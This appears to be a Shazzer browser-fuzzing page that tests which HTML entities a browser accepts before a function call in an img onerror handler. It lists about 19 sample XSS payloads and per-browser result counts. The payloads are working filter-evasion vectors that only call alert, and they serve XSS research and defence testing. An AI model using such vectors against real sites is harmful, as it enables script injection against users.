Entities allowed before function calls
This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created byhackvertor
Created Jul 2, 2024
Updated May 27, 2025
Detecting browser...
CategoryEntity Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml_entities
Template used:
<img src=data: onerror="$[data1]log('html($[data1])')">Sample payloads
<img src=data: onerror=" alert('&emsp13;')"><img src=data: onerror=" alert('&emsp14;')"><img src=data: onerror=" alert('&emsp;')"><img src=data: onerror=" alert('&ensp;')"><img src=data: onerror="!alert('&excl;')"><img src=data: onerror=" alert('&hairsp;')"><img src=data: onerror=" alert('&MediumSpace;')"><img src=data: onerror=" alert('&nbsp;')"><img src=data: onerror="
alert('&NewLine;')"><img src=data: onerror=" alert('&NonBreakingSpace;')"><img src=data: onerror=" alert('&numsp;')"><img src=data: onerror="+alert('&plus;')"><img src=data: onerror=" alert('&puncsp;')"><img src=data: onerror=";alert('&semi;')"><img src=data: onerror="	alert('&Tab;')"><img src=data: onerror="  alert('&ThickSpace;')"><img src=data: onerror=" alert('&ThinSpace;')"><img src=data: onerror=" alert('&thinsp;')"><img src=data: onerror=" alert('&VeryThinSpace;')">Fuzz results
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated31 Jan 2026
Found 19 results
Loading...
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated28 Jan 2026
Found 19 results
Loading...
Firefox 147.0 desktop Linux
Updated1 Feb 2026
Found 19 results
Loading...
Firefox 127.0 desktop macOS 10.15older version
Updated2 Jul 2024
Found 19 results
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated31 Jan 2026
Found 19 results
Loading...
Safari 18.0 desktop macOS 10.15.7
Updated2 Jul 2024
Found 19 results
Loading...